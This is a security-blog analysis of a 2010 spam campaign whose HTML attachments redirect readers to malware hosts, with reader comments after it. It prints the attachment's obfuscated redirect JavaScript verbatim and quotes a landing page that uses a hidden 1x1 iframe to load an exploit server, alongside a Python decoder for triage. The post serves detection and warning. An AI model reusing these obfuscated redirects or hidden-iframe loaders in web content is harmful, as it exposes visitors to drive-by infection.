“FIFA World Cup South Africa… bad news” emails lead readers to a host with malware
June 11, 2010
MX Lab intercepted a few samples of emails with the subject “FIFA World Cup South Africa… bad news”.
The From address is spoofed. This is the body of the email:
Hello!!
FIFA World Cup 2010 scandal news, read attached document
Attached is a file named news.html or open.html that contains malicious JavaScript:
<script type='text/javascript'>function dX(){};var h=new Date();dX.prototype = {f : function() {var u=function(){};var uY=new Date();var o="";var k=document;var oE=function(){};var l='';this.i=33457;var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];var w=function(){};var p=false;this.pP=false;this.s='';kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');var iK="iK";pK='';this.d="d";uM="";}};this.dK="";var fG=new dX();var dR="dR";fG.f();hJ=false;</script>
This JavaScript redirects the browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm. The obfuscation is simple: each important string is padded with filler characters, and a .replace(/[...]/g, '') call strips those characters again at run time, so 'l.oSc<a(t<i_oSnS' becomes location, 'hGrGe>f>' becomes href, and the long string becomes the URL above. Neither the URL nor the words location and href appear in the attachment as plain text.
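To triage such an attachment without executing it, the strip idiom can be evaluated statically. The following Python is an added example (not MX Lab's code); the sample attachment is a constructed condensation of the script above with its quotes restored, and the pattern only handles the simple character classes this campaign uses:

```python
import re

# Constructed sample: the core of the obfuscated attachment, quotes restored.
SAMPLE_ATTACHMENT = r"""<html><body><script type='text/javascript'>
function dX(){};var h=new Date();dX.prototype={f:function(){var k=document;
var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];
kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');
}};var fG=new dX();fG.f();</script></body></html>"""

# Matches the idiom 'noisy string'.replace(/[filler chars]/g, '').
# Assumption: only plain character classes (no ranges, only the g flag),
# which is all the sample uses.
STRIP_IDIOM = re.compile(r"'([^']*)'\.replace\(/\[([^\]]*)\]/g,\s*''\)")

URL_RE = re.compile(r"^https?://\S+$")


def decode_strings(script: str) -> list:
    """Statically evaluate every strip-idiom expression, in document order."""
    # The JS character class is also a valid Python character class here,
    # so the filler characters can be removed with re.sub directly.
    return [re.sub("[" + cls + "]", "", noisy)
            for noisy, cls in STRIP_IDIOM.findall(script)]


def triage(script: str) -> dict:
    """Summarise what the script would do without running it."""
    decoded = decode_strings(script)
    urls = [s for s in decoded if URL_RE.match(s)]
    # Assembling 'location' and 'href' from padded strings, together with a
    # decoded URL, is the signature of a hidden redirect.
    hidden_redirect = "location" in decoded and "href" in decoded and bool(urls)
    return {"decoded": decoded, "urls": urls, "hidden_redirect": hidden_redirect}


if __name__ == "__main__":
    print(triage(SAMPLE_ATTACHMENT))
```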
At the moment the page mentioned here is not active; we got a 404 error when visiting it, so we can’t investigate further. We are, however, pretty sure that it would make you download malware in an attempt to infect your computer and then redirect you to a Canadian Pharmacy spam web site.
This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.
Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.
[UPDATE]
MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.
This version leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The page z.htm contains the following code:
<meta http-equiv="refresh" content="3;url=hxxp://toldspeak.com/" /> <iframe src='hxxp://hugefrogs.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
The meta refresh redirects the browser to hxxp://toldspeak.com after 3 seconds; that site hosts the Canadian Pharmacy web site mentioned earlier. Meanwhile the hidden 1x1 iframe silently loads hxxp://hugefrogs.ru:8080/index.php?pid=10.

The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates iframes pointing to a PDF file and to a Java .jar file. One of these files is used to carry out the attack on the computer.

Thank you for deciphering this. I received it, and was very curious where it came from.
Our company recently received similar spoofed emails. Some sites obfuscated in the JavaScript were innocent and didn’t know their sites were being used as hosts. Here is a wiki article w/ some info on what you described. Although I understand it may be futile, I submitted complaints to the FTC (uec@ftc.gov) and the IC3. I also used Complainterator to aid in generating emails I sent to the registration organizations, asking them to remove the name servers hosting the spamming domains.